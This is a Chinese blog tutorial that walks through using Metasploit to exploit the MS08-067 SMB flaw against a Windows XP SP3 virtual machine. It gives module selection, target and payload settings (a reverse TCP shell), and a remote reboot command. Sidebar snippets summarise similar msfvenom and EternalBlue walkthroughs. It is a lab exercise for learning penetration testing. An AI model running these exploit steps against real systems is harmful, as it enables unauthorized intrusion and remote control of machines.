Metasploit-Framework利用ms08_067 漏洞渗透Windows XP SP3(Windows 10 主机)

最新推荐文章于 2024-05-21 08:54:04 发布
最新推荐文章于 2024-05-21 08:54:04 发布
阅读量1.5k 收藏 13
点赞数 2
文章标签: metasploit 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53979135/article/details/112919281
版权

前期准备

a)攻击主机:为Window10系统(本机)
在Metasploit官方网站下载Windows版本的Metasploit-framework(而不是pro版本),之后安装。在命令行输入 msfconsole 运行Metasploit。
在这里插入图片描述
b)目标主机:在网上搜索,安装了WindowsXP虚拟机,在Vmware中装载运行
在这里插入图片描述

安装完成后要对WindowsXP虚拟机做如下设置,否则会导致在exploit时显示连接超时或者拒绝连接。关闭防火墙,自动更新即可。
在这里插入图片描述

开始渗透测试

查找漏洞

输入命令:search ms08_067
在这里插入图片描述

选择模块

输入命令:use exploit/windows/smb/ms08_067_netapi
在这里插入图片描述在这里插入图片描述
info命令可以看到此模块的信息
在这里插入图片描述

查看该漏洞可浮现操作系统类型

输入命令:show targets
在这里插入图片描述
在这里插入图片描述第34个与目标主机匹配

设置目标主机参数

输入命令:show options
在这里插入图片描述
输入命令:set RHOSTS 目标主机的IP地址
输入命令:set RPORT 目标主机的端口
目标主机的IP地址:在目标主机命令行中输入 ipconfig 可得
在这里插入图片描述
目标主机的端口(本例需要开启445端口):在目标主机命令行输入:netstat -an

在这里插入图片描述
可见目标主机的445端口已经开启。如果没有开启,则需要在目标主机的命令行中输入regedit打开注册表,在HKEY_LOCAL_MACHINE中依次打开System\CurrentControlSet\Services\NetBT\Parameters,修改SMBDeviceEnabled的子键值为1。
设置完成之后再次输入 show options
在这里插入图片描述

查找并选择合适的攻击载荷

输入命令:show payloads
在这里插入图片描述
输入命令:set payload generic/shell_reverse_tcp 选择合适攻击载荷
在这里插入图片描述
输入攻击主机的参数
输入命令:set LHOST 攻击主机的IP地址
输入命令:set IPORT 攻击主机的端口
输入命令:set target 34 (34为上述确定)
(IP地址与端口确定同上)
在这里插入图片描述再次输入show options 查看参数设置情况
在这里插入图片描述

开始攻击

输入命令:exploit
在这里插入图片描述
攻击成功!

测试命令

尝试输入:shutdown -r -f -t 0(为重启命令)
在这里插入图片描述

Zoran_db
关注
  • 2
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【kail】使用Metasploit 渗透Windows10
爪白白的个人博客
12-14 6915
一、在Kali Linux中生成被控端(msfvenom命令) 第一步:下面我们用msfvenom命令使用反向远程控制程序“windows/meterpreter/reverse_tcp”。该软件执行时自动连接IP“192.168.43.77”,连接的端口为“5000”,生成的文件为payload.exe,在/root目录下 msfvenom -p windows/meterpreter/re...
Kali使用Metapsloit渗透win10 生成 payload 反弹shell
weixin_45908624的博客
07-19 2354
windows payload 反弹shell
掌握安全渗透测试利用永恒之黑漏洞获取Windows 10系统访问权限
最新发布
weixin_43822401的博客
05-21 1120
靶机:IP地址为,运行Windows 10 1903版本。攻击机:IP地址为。文档提供了利用永恒之黑漏洞Windows 10进行渗透的详细步骤,包括获取初始访问、创建远程桌面用户、开启后门以及维持权限访问。请注意,这些步骤仅供教育目的,实际操作应在授权的渗透测试和安全研究环境中进行。未经授权的渗透测试可能违反法律。
2021-05-07 使用metasploit(MSF) 和 木马 入侵win10 虚拟机
White_give_boy的博客
05-07 1393
使用metasploit(MSF) 和 木马 入侵win10 0x01 实验环境 攻击机:kali linux ip:192.168.171.128 目标机:windows 10 家庭普通版 ip:物理主机 0x02配置msf 1.开启数据库服务 service postgresql start 2.初始化数据库 msfdb init 3.进入msf 4. 加载模块,显示参数 5. 修改参数 LHOST为攻击机ip,LPORT为监听端口 6.开始监...
内网安全:Msfconsole攻击技术(成功拿下服务器最高权限.)
网络安全领域___专研者.
03-22 1万+
Msfconsole工具概括: Msfconsole简称(msf)是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全测试人员的使用. (1)进行端口扫描. (2)进行服务的扫描.(3)扫描3306(Mysql)端口的弱口令.(4)在msf模块里也可以使用nmap进行扫描.(5)扫描了服务器是用Win XP,然后对服务器进行渗透测试.
使用MSF 利用 ms08_067XP 进行渗透
枫梓林のBlog
04-21 2198
利用 ms08_067XP 进行渗透 文章目录利用 ms08_067XP 进行渗透一、项目要求二、项目实施1. 实施目标2. 实施方案2.1 扫描该网段存活的主机2.2 使用nmap 判断目标主机IP地址2.3 使用 nessus 扫描该系统漏洞2.4 使用 MetasploitXP 进行渗透三、总结 一、项目要求 渗透XP系统 在系统中执行几条命令 二、项目实施 1. 实施目标 使用工具寻找目标内存活的主机 使用工具,判断其操作系统,及相关信息收集 扫描该系统的漏洞进行
Windows XP SP2(MS08-067漏洞复现及利用)
sGanYu
09-03 5200
打开kali,开启msf所依赖的数据库 启动msfconsole 搜寻关于ms08-067有关的漏洞 使用 输入show options显示ms08-067模块所需的参数 配置参数,设置目标操作系统类型为4
毒蛇:metasploit-framework图形界面图形化内网渗透工具
02-01
Metasploit-Framework是一个开源项目,由 Rapid7 维护,它包含了大量的漏洞利用模块、payloads(有效载荷)以及后渗透工具。这个框架允许安全专家和道德黑客模拟攻击,测试网络防御,评估安全风险。通过Metasploit,...
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
metasploit-lowlevel_metasploit_
10-02
在网络安全领域,Metasploit框架是一个不可或缺的工具,尤其对于那些希望深入学习漏洞利用技术的黑客来说。Metasploit不仅提供了丰富的exploit(漏洞利用)模块,还能帮助安全研究人员理解攻击链的各个环节。本篇...
metasploit-framework-master.zip
09-08
"metasploit-framework-master.zip" 是这个框架的源代码压缩包,包含了完整的开发环境和工具集合。 **Metasploit框架的核心组件** 1. **Payloads(有效载荷)**:有效载荷是攻击的核心部分,它们在目标系统上执行...
MS08-067漏洞利用工具
11-01
MS08-067 漏洞利用工具 MS08-067漏洞利用工具MS08-067 漏洞利用工具 MS08-067漏洞利用工具MS08-067 漏洞利用工具 MS08-067漏洞利用工具MS08-067 漏洞利用工具 MS08-067漏洞利用工具MS08-067 漏洞利用工具 MS08-067漏洞利用工具
metasploit-framework-6.3.34.zip
09-17
Metasploit Framework,简称MSF,是一款开源的安全漏洞检测工具,主要用于安全研究人员进行渗透测试漏洞验证。这个版本是6.3.34,代表着软件的最新迭代,通常包含最新的功能、修复和性能改进。在网络安全领域,...
msf之msfvenom的使用—使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 3632
msfvenom的使用
metasploit xp_sp3中文版系统rop修改
红领巾 的专栏
06-30 1089
之前用metasploit IE8进行试验的时,老发现不行
Metasploit 利用 MS17-010漏洞(永恒之蓝)
test
11-20 1万+
环境 攻击机器:ubuntu 18.04 被攻击机器:windows xp sp2 可能使用的工具 metasploit nessus nmap等 正文 首先搭建所需要的靶机环境和安装所有可能使用到的工具,接着使用类似nessus等工具扫描目标网段。以下是扫描结果,靶机的IP是192.168.1.166 发现这个没有打补丁的靶机存在很多的漏洞,本篇博文利用的是MS17-10(永恒之蓝) ...
使用metasploit(MSF)对windows的ms17-010漏洞进行利用的过程
热门推荐
D-river博客
10-11 4万+
强大的metasploit平台加入了永恒之蓝漏洞利用exploit,可以对ms17-010漏洞进行利用,支持对windows7和windows 2008 R2。
MS08-067漏洞 远程溢出入侵测试
十月鱼的博客(本博客不再更新,作者迁移至:http://wiki.51centos.com)
03-06 5592
MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程履行代码。在 Microsoft Windows 2000、Windows XPWindows Server 2003 系统上,攻击者可能未经身份验证即可利用漏洞运行任意代码,此漏洞可用于进行蠕虫攻击. 下面的实验为本地测试环境,...
WindowsXP SP3 AFD.sys 本地拒绝服务漏洞的挖掘过程
Less Is More
05-28 5685
标 题: WindowsXP SP3 AFD.sys 本地拒绝服务漏洞的挖掘过程 时 间: 2013-03-17,15:22:33 这是本人第一次做漏洞挖掘,2月的时候开始研究漏洞挖掘技术,2月24号那天在进行Fuzz测试的时候偶然的发现了一个afd.sys未处理的异常,然后就对这个异常如获至宝的分析起来了,因为在上班,所以都是利用周末时间来进行,前前后后到加起来差不多5天时间。现在这个漏
计算机系统安全-实验二-metasploit.doc
12-10
在第一部分的基础上,实验者将使用Metasploit来探测被渗透机的服务漏洞利用MS08-067漏洞进行远程渗透Metasploit是一个开源的渗透测试框架,它提供了丰富的模块,可以自动化执行各种攻击和渗透任务。在这个环节...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值